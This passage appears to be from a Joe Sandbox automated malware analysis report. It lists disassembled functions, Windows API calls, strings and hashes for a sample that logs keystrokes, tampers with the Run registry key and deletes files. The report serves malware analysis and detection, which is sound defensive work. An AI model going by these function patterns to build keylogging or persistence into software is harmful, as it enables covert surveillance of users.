                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02832920
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 432f88af0f919fddebc06acbbf9b6a17a1cd102ccfeab3ecec1aed4613a3ad7e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9412cc027a19e5fcbd4caa02f289d4ab501f770107510977ac0e2317966c604f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 432f88af0f919fddebc06acbbf9b6a17a1cd102ccfeab3ecec1aed4613a3ad7e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BF0C23CA0430C778F06B6ADEC449ADB76DAF00754B508170EE29D6198EF71EE26C9C2
                                                                                                                                                                                                                                                                                                                              Function 0044DDF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 0044DE29
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044DE5D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID: 09~
                                                                                                                                                                                                                                                                                                                              • API String ID: 289325740-1645473027
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cba5e3b893efa1f4c196fd8b6ab646112b65b39245522f8e75cb99aab8fd3b38
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c3d52a826ce14ac6b731adabf6d8033b48d69a437140057254d59f729b4b779c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba5e3b893efa1f4c196fd8b6ab646112b65b39245522f8e75cb99aab8fd3b38
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB01A1B1D02E21DBEB71AF69980121EB3B0AF54B20B25011BE9546B381C73C6942CFCE
                                                                                                                                                                                                                                                                                                                              Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocaleValid
                                                                                                                                                                                                                                                                                                                              • String ID: IsValidLocaleName$z=D
                                                                                                                                                                                                                                                                                                                              • API String ID: 1901932003-2791046955
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                                                                                                                                                                                                                              Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                                                                                                              • String ID: T=G$T=G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3519838083-3732185208
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                                                                                                                                                                                                                                              Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                                                                                                                                                              • String ID: [AltL]$[AltR]
                                                                                                                                                                                                                                                                                                                              • API String ID: 2738857842-2658077756
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                                                                                                                                                              Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448835
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                                                                                                                                              • String ID: `@$`@
                                                                                                                                                                                                                                                                                                                              • API String ID: 1353095263-20545824
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                                                                                                              • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                                                                                                                                                                                                                                              Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: State
                                                                                                                                                                                                                                                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                                                                                                                                              • API String ID: 1649606143-2446555240
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                                                                                                                                                              Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                                                                                                                              • API String ID: 2654517830-1051519024
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                                                                                                                                                              Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 3325800564-4028850238
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                                                                                                                                                                                                              Function 1000A5C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 1000A5D2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000A547: std::exception::exception.LIBCONCRT ref: 1000A554
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A5E0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                                              • API String ID: 1586462112-410509341
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0adb93ce51021025e8d7fce423e68b35576232a694bedcd472ba45c4d6c42089
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0D0A73C90010C77DB04DAA4DC41D9C776CFF05184FD08060B654C2145EB31EA998781
                                                                                                                                                                                                                                                                                                                              Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 1872346434-4028850238
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
